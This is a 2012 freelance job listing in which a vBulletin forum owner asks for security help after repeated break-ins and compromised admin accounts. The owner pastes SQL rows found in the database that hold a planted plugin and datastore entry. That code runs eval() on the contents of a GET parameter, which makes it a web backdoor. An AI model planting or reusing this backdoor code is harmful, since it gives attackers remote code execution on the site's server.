vbulletin plugins/scripts security issues

In Progress Posted Feb 6, 2012 Paid on delivery
In Progress Paid on delivery

Some person keeps hacking into my forum somehow and deposits a file called [url removed, login to view] in my main forum directory.

Somehow he has managed to hack into my other 3 admin friends accounts and tried to write a plugin in the forum that created the [url removed, login to view] shell file into my forum root.

my forum is

[url removed, login to view]

i require a capable person in security to take a look at my forum / cpanel and apply the required security measures in order for such thing not to happen again.

It is possible that this person has made a MySQL injection somehow but i am unsure !

An expert is required !

This was in my database before i deleted from my forum admin panel :

INSERT INTO `plugin` (`pluginid`, `title`, `hookname`, `phpcode`, `product`, `devkey`, `active`, `executionorder`) VALUES

(617, 'Sample', 'global_start', 'if (isset($_GET[''foo''])) die(eval(''$u="[url removed, login to view]";'' . $_GET[''foo'']));', 'vbulletin', '', 1, 5);

and

INSERT INTO `datastore` (`title`, `data`, `unserialize`) VALUES

\r\n \r\nif (isset($_GET[''foo''])) die(eval(''$u="[url removed, login to view]";'' . $_GET[''foo'']));\r\n";s:10:"misc_start";s:53180:"\r\n if ($vbulletin->options[''vsatopstats_enable_global''] AND !is_member_of($vbulletin->userinfo, explode('','', $vbulletin->options[''vsatopstats_excl_groups''])))\r\n {\r\n $vsacb_resnr = $vbulletin->input->clean_gpc(''r'', ''vsacb_resnr'', TYPE_UINT);\r\n if ($vsacb_resnr < 1)\r\n {\r\n $vsacb_resnr = intval($vbulletin->options[''vsatopstats_amount_more'']);\r\n ( it continues i donno if i must paste all )

MySQL PHP Shell Script vBulletin

Project ID: #1431188

About the project

1 proposal Remote project Active Feb 6, 2012